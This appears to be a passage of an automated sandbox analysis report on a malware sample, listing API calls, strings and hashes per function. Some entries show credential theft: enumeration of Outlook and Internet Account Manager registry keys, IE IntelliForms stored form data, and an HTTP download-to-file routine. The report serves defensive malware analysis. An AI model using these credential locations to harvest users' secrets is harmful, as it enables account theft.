                    • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 004525FD
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0045262E
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                    • String ID:
                    • API String ID: 1518329722-0
                    • Opcode ID: a66fcb2d7830fa1dd1191a284929ae0fbf03e259cf893e42bfff633e70e6cfad
                    • Instruction ID: a0213206f9d6618e83a31fffb84ca1d5626d93a1db5db772bd69efcd5023a436
                    • Opcode Fuzzy Hash: a66fcb2d7830fa1dd1191a284929ae0fbf03e259cf893e42bfff633e70e6cfad
                    • Instruction Fuzzy Hash: 6DF02B319002047BEB14CF68CE55B6E77E9FB4531EF24464EA802D3281E6B8DA098749
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0044110B
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: FeaturePresentProcessor
                    • String ID:
                    • API String ID: 2325560087-0
                    • Opcode ID: 30d91c6c6eceee7ea624845c7a6203fdebef525337a75faa7f7fc3de99ac17e2
                    • Instruction ID: 78dda9306d6e0d458aec20655ef60c44ad7b9f2088313bdef2a919ef7099b215
                    • Opcode Fuzzy Hash: 30d91c6c6eceee7ea624845c7a6203fdebef525337a75faa7f7fc3de99ac17e2
                    • Instruction Fuzzy Hash: 70514CB1A012058FEB25CF55D8857AEBBF2FB48310F24896ED505FB3A0D3789984CB58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bf271d08740ef121be158930cd8abc15109b4144b02da9a2b1653b22ea232180
                    • Instruction ID: 0e84909a3eff48e1157ccfb05ef3dbef565af4a23e47577209e0004930552ffc
                    • Opcode Fuzzy Hash: bf271d08740ef121be158930cd8abc15109b4144b02da9a2b1653b22ea232180
                    • Instruction Fuzzy Hash: 774194B1804219AEDB20DF69CC89AABBBB9AB45304F1442DEE41DD3211EA349E848F54
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 0045A1CF: GetLastError.KERNEL32(?,?,?,00452DDB,00485C98,00000008,0043F87A,?,00415450,?,7FFFFFFF,?,00000000,00415155), ref: 0045A1D4
                      • Part of subcall function 0045A1CF: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,?,00452DDB,00485C98,00000008,0043F87A,?,00415450,?,7FFFFFFF,?,00000000), ref: 0045A272
                      • Part of subcall function 0045A1CF: _free.LIBCMT ref: 0045A231
                      • Part of subcall function 0045A1CF: _free.LIBCMT ref: 0045A267
                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0046351E
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast_free$InfoLocale
                    • String ID:
                    • API String ID: 2003897158-0
                    • Opcode ID: 95efd63ec7a6a1bb89bf21bf336e03b0af13ace4dfe0b24c3486418d3e47b43b
                    • Instruction ID: 4f44656626ac9d70af807bf7cf4b668f42a88681b86125192b83c6577a41e474
                    • Opcode Fuzzy Hash: 95efd63ec7a6a1bb89bf21bf336e03b0af13ace4dfe0b24c3486418d3e47b43b
                    • Instruction Fuzzy Hash: 6121A172604256ABDB289E26CC41ABB73ACEF04316F10047FFD02C7251FA789E058B5A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 0045A1CF: GetLastError.KERNEL32(?,?,?,00452DDB,00485C98,00000008,0043F87A,?,00415450,?,7FFFFFFF,?,00000000,00415155), ref: 0045A1D4
                      • Part of subcall function 0045A1CF: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,?,00452DDB,00485C98,00000008,0043F87A,?,00415450,?,7FFFFFFF,?,00000000), ref: 0045A272
                    • EnumSystemLocalesW.KERNEL32(00463277,00000001,00000000,?,-00000050,?,004638A5,00000000,?,?,?,00000055,?), ref: 004631C3
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$EnumLocalesSystem
                    • String ID:
                    • API String ID: 2417226690-0
                    • Opcode ID: 53efe1e32a60e72e113017d4e39979414bcff77c047cf9d2419efefb403f62d7
                    • Instruction ID: 5f5e7cf9245bd65d2178e2504efb533cadd3901ecb1c60cd0ca9a106c195852e
                    • Opcode Fuzzy Hash: 53efe1e32a60e72e113017d4e39979414bcff77c047cf9d2419efefb403f62d7
                    • Instruction Fuzzy Hash: 5E11E93A2007015FDB189F39C8A15BAB7A1FF85759B14442EE94787B40E775BA42C744
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 0045A1CF: GetLastError.KERNEL32(?,?,?,00452DDB,00485C98,00000008,0043F87A,?,00415450,?,7FFFFFFF,?,00000000,00415155), ref: 0045A1D4
                      • Part of subcall function 0045A1CF: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,?,00452DDB,00485C98,00000008,0043F87A,?,00415450,?,7FFFFFFF,?,00000000), ref: 0045A272
                    • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00463493,00000000,00000000,?), ref: 00463722
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$InfoLocale
                    • String ID:
                    • API String ID: 3736152602-0
                    • Opcode ID: 1dff25c004560d134a3382a5f1094f19fd86a0a4d01ada95e2657408cd23a3b9
                    • Instruction ID: 491f126d108cbd4f09aa291da59007a58e4173c39b7137e12a3e4fb0bbb7d615
                    • Opcode Fuzzy Hash: 1dff25c004560d134a3382a5f1094f19fd86a0a4d01ada95e2657408cd23a3b9
                    • Instruction Fuzzy Hash: 26F0F9B6600255ABDB285E25CC05BFB7754EB40766F14882AEC05A3240FA78FF01C59A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 0045A1CF: GetLastError.KERNEL32(?,?,?,00452DDB,00485C98,00000008,0043F87A,?,00415450,?,7FFFFFFF,?,00000000,00415155), ref: 0045A1D4
                      • Part of subcall function 0045A1CF: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,?,00452DDB,00485C98,00000008,0043F87A,?,00415450,?,7FFFFFFF,?,00000000), ref: 0045A272
                    • EnumSystemLocalesW.KERNEL32(004634CA,00000001,00000000,?,-00000050,?,00463869,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00463236
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$EnumLocalesSystem
                    • String ID:
                    • API String ID: 2417226690-0
                    • Opcode ID: cf60db168e04f4e7e8066a5bfbe348eca30c7689f8337ac0bcfb34025bfe7bef
                    • Instruction ID: 43dcd588534f9ba41f1c4da59640f0f71cc63822238506521bf04f6801855350
                    • Opcode Fuzzy Hash: cf60db168e04f4e7e8066a5bfbe348eca30c7689f8337ac0bcfb34025bfe7bef
                    • Instruction Fuzzy Hash: 93F046363003045FDB146F36DCD1A7B7B91EF80B29F04446EF9058B681E6B9AD42C604
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 00452E47: EnterCriticalSection.KERNEL32(-0004D6F9,?,00454681,00000000,00485CD8,0000000C,00454648,?,?,0045869B,?,?,0045A371,00000001,00000364,00000006), ref: 00452E56
                    • EnumSystemLocalesW.KERNEL32(004586C5,00000001,00485E38,0000000C,00458BA4,00000000), ref: 0045870A
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalEnterEnumLocalesSectionSystem
                    • String ID:
                    • API String ID: 1272433827-0
                    • Opcode ID: 1d202890ca4664210355ba173891f3f891d9dc9c8124ed4c9ed11025cd4bd11e
                    • Instruction ID: 04de29c1d145811c4558f9444f103b4498ce4987f0c71113c2ec88f8938bdea2
                    • Opcode Fuzzy Hash: 1d202890ca4664210355ba173891f3f891d9dc9c8124ed4c9ed11025cd4bd11e
                    • Instruction Fuzzy Hash: E5F03776A04200DFEB00EF99E842B9D77B0FB09765F20452FF811AB2A1CBB959048F58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 0045A1CF: GetLastError.KERNEL32(?,?,?,00452DDB,00485C98,00000008,0043F87A,?,00415450,?,7FFFFFFF,?,00000000,00415155), ref: 0045A1D4
                      • Part of subcall function 0045A1CF: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,?,00452DDB,00485C98,00000008,0043F87A,?,00415450,?,7FFFFFFF,?,00000000), ref: 0045A272
                    • EnumSystemLocalesW.KERNEL32(0046305F,00000001,00000000,?,?,004638C7,-00000050,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 0046313D
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast$EnumLocalesSystem
                    • String ID:
                    • API String ID: 2417226690-0
                    • Opcode ID: c3aa56c218d98d16bfaa17ade16a26b7c9216246f475a12d4d728c4b249193cd
                    • Instruction ID: d26f9d7f564e3a0dace032983a3237c1fc2f951e21d912e4c8cd4c7919788a3f
                    • Opcode Fuzzy Hash: c3aa56c218d98d16bfaa17ade16a26b7c9216246f475a12d4d728c4b249193cd
                    • Instruction Fuzzy Hash: 89F05C3530034457CB04AF36CC456A67F95EFC3B21B060059EA058B242D2799D42C755
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ec1405ff4b531a2f40d21fc66eee1f666ce24e5371066e553dac401da329c41b
                    • Instruction ID: 4fd589a5a2eac14d427e08e35b9f43ca904a6754cf203175979c70f23e5a2789
                    • Opcode Fuzzy Hash: ec1405ff4b531a2f40d21fc66eee1f666ce24e5371066e553dac401da329c41b
                    • Instruction Fuzzy Hash: 16F0F632A441209BC719DA9C8519B59B39BE705B11F140257EB01EB392C2B8FE04C7C9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6453632eaece89934e7a6284f84e7ef48e98100d22f0aaa775692452f11a6854
                    • Instruction ID: 9c469e4703f267ba214f69fb08b05ecd2c08c8e7fec17f3ad30172b618aa5c3d
                    • Opcode Fuzzy Hash: 6453632eaece89934e7a6284f84e7ef48e98100d22f0aaa775692452f11a6854
                    • Instruction Fuzzy Hash: E2F0A031A112249BCB1ADB8CC944B4973ACEB44B15F11459BF901E7241D7B8DD08C7C8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: dcbc6657b823d3309f91c869185bc9853ab1aed32f24dc93abc91c73ac04aa9e
                    • Instruction ID: c252d408c27b30398b4c9cd887e02bd4edce58a2f7e45a711453edc3f3eb5a1f
                    • Opcode Fuzzy Hash: dcbc6657b823d3309f91c869185bc9853ab1aed32f24dc93abc91c73ac04aa9e
                    • Instruction Fuzzy Hash: C9E08C32911228EBCB18DBCDCA0498AF3ECEB45B45B15059BF901E3202C6B4DE44C7E4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • __EH_prolog.LIBCMT ref: 0043490D
                    • WinHttpOpen.WINHTTP(00000000,00000000,00000000,00000000,00000000,00000001,0000000F,00000000), ref: 0043494B
                    • CreateFileA.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 0043496F
                    • WinHttpConnect.WINHTTP(?,00000000,000001BB,00000000,?,00000001,00000000,00000002,00000080,00000000), ref: 00434A3D
                      • Part of subcall function 004390C6: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000), ref: 004390EB
                      • Part of subcall function 004390C6: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,?,00000000,00000000,?,?,00000000,00000000), ref: 00439132
                    • WinHttpConnect.WINHTTP(?,00000000,00000050,00000000,?,00000001,00000000,00000002,00000080,00000000), ref: 00434A97
                    • WinHttpOpenRequest.WINHTTP(00000000,GET,00000000,00000000,00000000,00000000,00800100,?), ref: 00434B0F
                    • WinHttpOpenRequest.WINHTTP(00000000,GET,00000000,00000000,00000000,00000000,00000100,?), ref: 00434B76
                    • WinHttpSendRequest.WINHTTP(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00434BA6
                    • WinHttpReceiveResponse.WINHTTP(00000000,00000000), ref: 00434BB2
                    • WinHttpQueryDataAvailable.WINHTTP(00000000,?), ref: 00434BC7
                    • WinHttpReadData.WINHTTP(00000000,00000000,?,?), ref: 00434BF2
                    • WriteFile.KERNEL32(?,00000000,?,A7A7BB2C,00000000), ref: 00434C07
                    • GetLastError.KERNEL32 ref: 00434C22
                    • WinHttpCloseHandle.WINHTTP(00000000), ref: 00434C29
                    • WinHttpCloseHandle.WINHTTP(00000000), ref: 00434C33
                    • CloseHandle.KERNEL32(?,00000001,00000000,00000002,00000080,00000000), ref: 00434C3C
                    • WinHttpCloseHandle.WINHTTP(?), ref: 00434C43
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: Http$CloseHandle$OpenRequest$ByteCharConnectDataFileMultiWide$AvailableCreateErrorH_prologLastQueryReadReceiveResponseSendWrite
                    • String ID: %99[^:]://%99[^/]%99[^]$GET
                    • API String ID: 4006077129-3478069819
                    • Opcode ID: 31ccd88d0ea5fcbac2f57e344e71377b9a11b613e4e4578c3cac402c72a841e7
                    • Instruction ID: 5af4c6be2dbc162ad7ceaacfbc26ef85040c522f300265b3c5ec17b35c183e62
                    • Opcode Fuzzy Hash: 31ccd88d0ea5fcbac2f57e344e71377b9a11b613e4e4578c3cac402c72a841e7
                    • Instruction Fuzzy Hash: C2A18D71901259EFDB10DFA1CC85BEEBBB8BF49304F1041AAE405A7241EB786E44CF69
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 00434E00: LoadLibraryA.KERNEL32(?), ref: 00434E3F
                      • Part of subcall function 00434E00: GetProcAddress.KERNEL32(00000000,?), ref: 00434E7A
                      • Part of subcall function 00434E00: FreeLibrary.KERNEL32(00000000), ref: 00434EAE
                      • Part of subcall function 0043525A: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0043527F
                      • Part of subcall function 0043525A: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00435310
                      • Part of subcall function 0043525A: RegCloseKey.ADVAPI32(?), ref: 0043531D
                      • Part of subcall function 00435327: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0043534E
                      • Part of subcall function 00435327: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00435379
                      • Part of subcall function 00435327: lstrlenW.KERNEL32(?), ref: 00435390
                      • Part of subcall function 00435327: lstrlenW.KERNEL32(?), ref: 0043539D
                      • Part of subcall function 00435327: lstrcpyW.KERNEL32 ref: 004353BE
                      • Part of subcall function 00435327: lstrcatW.KERNEL32(00000000,0047E440), ref: 004353CA
                      • Part of subcall function 00435327: lstrcatW.KERNEL32(00000000,?), ref: 004353D8
                      • Part of subcall function 00435327: lstrcatW.KERNEL32(00000000,?), ref: 004353E4
                      • Part of subcall function 00435327: RegEnumKeyExW.ADVAPI32(?,?,?,000007FF,00000000,00000000,00000000,00000000), ref: 0043541E
                      • Part of subcall function 00435327: RegCloseKey.ADVAPI32(?), ref: 00435433
                      • Part of subcall function 00435D8C: RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Internet Explorer\IntelliForms\Storage2,00000000,00000100,00000100,?,00000000), ref: 00435DD4
                      • Part of subcall function 00435D8C: RegQueryValueExW.ADVAPI32(00000100,?,00000000,?,00000000,00000000,?,00000000), ref: 00435DF3
                      • Part of subcall function 00435D8C: RegQueryValueExW.ADVAPI32(00000100,?,00000000,00000000,00000000,00000000,?,00000000), ref: 00435E2E
                      • Part of subcall function 00435D8C: RegCloseKey.ADVAPI32(00000100,?,00000000), ref: 00435E4F
                    • lstrlenW.KERNEL32(00000000), ref: 004357F4
                    • lstrcpyW.KERNEL32 ref: 0043580C
                    • lstrcpyW.KERNEL32 ref: 00435818
                      • Part of subcall function 0043525A: lstrlenW.KERNEL32(?), ref: 004352A5
                      • Part of subcall function 0043525A: lstrcpyW.KERNEL32 ref: 004352C2
                      • Part of subcall function 0043525A: lstrcatW.KERNEL32(00000000,0047E440), ref: 004352CE
                      • Part of subcall function 0043525A: lstrcatW.KERNEL32(00000000,?), ref: 004352DC
                      • Part of subcall function 00445EF8: _free.LIBCMT ref: 00445F0B
                    Strings
                    • Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook, xrefs: 00435872
                    • Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook, xrefs: 0043588E
                    • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings, xrefs: 0043584B
                    • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook, xrefs: 00435856
                    • Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook, xrefs: 004358BE
                    • Outlook, xrefs: 004357D5
                    • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 004357B0
                    • Identities, xrefs: 004357C6
                    • Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook, xrefs: 00435864
                    • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00435839
                    • Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook, xrefs: 004358AA
                    • \Software\Microsoft\Internet Account Manager\Accounts, xrefs: 004357BC
                    • \Accounts, xrefs: 00435812
                    • Software\Microsoft\Internet Account Manager, xrefs: 004357DA
                    • Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook, xrefs: 00435880
                    • Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook, xrefs: 0043589C
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$lstrcpylstrlen$CloseEnumOpen$LibraryQueryValue$AddressFreeLoadProc_free
                    • String ID: Identities$Outlook$Software\Microsoft\Internet Account Manager$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook$\Accounts$\Software\Microsoft\Internet Account Manager\Accounts
                    • API String ID: 527226083-92925148
                    • Opcode ID: 52ca32acb80db4437e2020b10a5da6ba3c5dd28f00778ef8e4dc34acd294d9cc
                    • Instruction ID: 52e7072680fc62cdb320c780ebfe52bbf98b90ab59bff941ca607e0908511d4c
                    • Opcode Fuzzy Hash: 52ca32acb80db4437e2020b10a5da6ba3c5dd28f00778ef8e4dc34acd294d9cc
                    • Instruction Fuzzy Hash: 9B314FB1500608BEE704EBA2DD83DFE73BCEB5C748FA0559EF44516081EFB85E059A29
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$___from_strstr_to_strchr
                    • String ID:
                    • API String ID: 3409252457-0
                    • Opcode ID: fe642fdafbf68be05d66de69230605fe2dbcd6f0e9d18b9567630cbbf145f747
                    • Instruction ID: 69a80de526f5df8ff07eeffc47bdc291ca6a6fa3de145c66cb203f50907c2813
                    • Opcode Fuzzy Hash: fe642fdafbf68be05d66de69230605fe2dbcd6f0e9d18b9567630cbbf145f747
                    • Instruction Fuzzy Hash: E0D1F3B1900305AFDB20BF758882A6E77A8EF05316F14456FED4197383EB389949CB9D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$Info
                    • String ID:
                    • API String ID: 2509303402-0
                    • Opcode ID: 66d5b842ddd007ef9f6ea2b1259c3b11835b80d0f4a0a8f82ece8eb51989f7b6
                    • Instruction ID: 1a47956bf63ae8cc2768381a9d877290177edccec9af289c0c6ce20b900da36a
                    • Opcode Fuzzy Hash: 66d5b842ddd007ef9f6ea2b1259c3b11835b80d0f4a0a8f82ece8eb51989f7b6
                    • Instruction Fuzzy Hash: F1D1AF719003059FDB218F65C981BEEBBB5BF09305F14402EE895BB353DBB8A849CB58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetModuleHandleExW.KERNEL32(00000006,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0044F5BF
                    • GetModuleFileNameW.KERNEL32(?,?,00000105,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0044F5E3
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: Module$FileHandleName
                    • String ID: (Press Retry to debug the application - JIT must be enabled)$...$<program name unknown>$Assertion failed!$Expression: $File: $For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts$Line: $Program: $\
                    • API String ID: 4146042529-3261600717
                    • Opcode ID: f8034c1cdcde1a524263459538fbe216e9836c6c9754feab738c995100a7b409
                    • Instruction ID: b4274328c909fdfb88fe5ea3ecc5fc5c70d02b678a9486ce6fcc2d10a7dd17ed
                    • Opcode Fuzzy Hash: f8034c1cdcde1a524263459538fbe216e9836c6c9754feab738c995100a7b409
                    • Instruction Fuzzy Hash: B6C1D771A402057BFB206A258D87FEB72A89F66704F1404BBFC0991256F73C9F49C66D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • __EH_prolog.LIBCMT ref: 004211E9
                    • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0042120E
                      • Part of subcall function 00413E27: _Deallocate.LIBCONCRT ref: 00413E3C
                      • Part of subcall function 0040C5A5: __EH_prolog.LIBCMT ref: 0040C5AA
                      • Part of subcall function 00414005: _Deallocate.LIBCONCRT ref: 00414014
                      • Part of subcall function 004360CE: GetEnvironmentVariableA.KERNEL32(?,?,00000104,00000000), ref: 0043611A
                      • Part of subcall function 00435C2D: __EH_prolog.LIBCMT ref: 00435C32
                      • Part of subcall function 00435C2D: _strcat.LIBCMT ref: 00435C8D
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
                    Similarity
                    • API ID: H_prolog$Deallocate$EnvironmentFolderPathVariable_strcat
                    • String ID: ,7-c$5/$<6p]$K$Profiles$UOUH$[GE[$s$y
                    • API String ID: 68644425-2620514704
                    • Opcode ID: 6eadc8a706fcb21a95d9d5a4f3757147cb4efe1986d906902349050cf5027098
                    • Instruction ID: 3c83c8308f78a08ee4bf23d8f3ace9da36a91ab9931530a5a88d3d402fe34580
                    • Opcode Fuzzy Hash: 6eadc8a706fcb21a95d9d5a4f3757147cb4efe1986d906902349050cf5027098
                    • Instruction Fuzzy Hash: A412DF30D042A8CADF15DBA5C851BEDBBB1AF69304F1041AED44977292EB781FC9CB19
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • ___free_lconv_mon.LIBCMT ref: 0046248F
                      • Part of subcall function 004617E9: _free.LIBCMT ref: 00461806
                      • Part of subcall function 004617E9: _free.LIBCMT ref: 00461818
                      • Part of subcall function 004617E9: _free.LIBCMT ref: 0046182A
                      • Part of subcall function 004617E9: _free.LIBCMT ref: 0046183C
                      • Part of subcall function 004617E9: _free.LIBCMT ref: 0046184E
                      • Part of subcall function 004617E9: _free.LIBCMT ref: 00461860
                      • Part of subcall function 004617E9: _free.LIBCMT ref: 00461872
                      • Part of subcall function 004617E9: _free.LIBCMT ref: 00461884
                      • Part of subcall function 004617E9: _free.LIBCMT ref: 00461896
                      • Part of subcall function 004617E9: _free.LIBCMT ref: 004618A8
                      • Part of subcall function 004617E9: _free.LIBCMT ref: 004618BA
                      • Part of subcall function 004617E9: _free.LIBCMT ref: 004618CC
                      • Part of subcall function 004617E9: _free.LIBCMT ref: 004618DE
                    • _free.LIBCMT ref: 00462484
                      • Part of subcall function 0045813E: HeapFree.KERNEL32(00000000,00000000,?,00461F3E,?,00000000,?,00000002,?,004621E1,?,00000007,?,?,004625E2,?), ref: 00458154
                      • Part of subcall function 0045813E: GetLastError.KERNEL32(?,?,00461F3E,?,00000000,?,00000002,?,004621E1,?,00000007,?,?,004625E2,?,?), ref: 00458166
                    • _free.LIBCMT ref: 004624A6
                    • _free.LIBCMT ref: 004624BB
                    • _free.LIBCMT ref: 004624C6
                    • _free.LIBCMT ref: 004624E8
                    • _free.LIBCMT ref: 004624FB
                    • _free.LIBCMT ref: 00462509
                    • _free.LIBCMT ref: 00462514
                    • _free.LIBCMT ref: 0046254C
                    • _free.LIBCMT ref: 00462553
                    • _free.LIBCMT ref: 00462570
                    • _free.LIBCMT ref: 00462588
                    Memory Dump Source
                    • Source File: 00000002.00000002.503612673.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_LaunchWinApp.jbxd
                    Yara matches
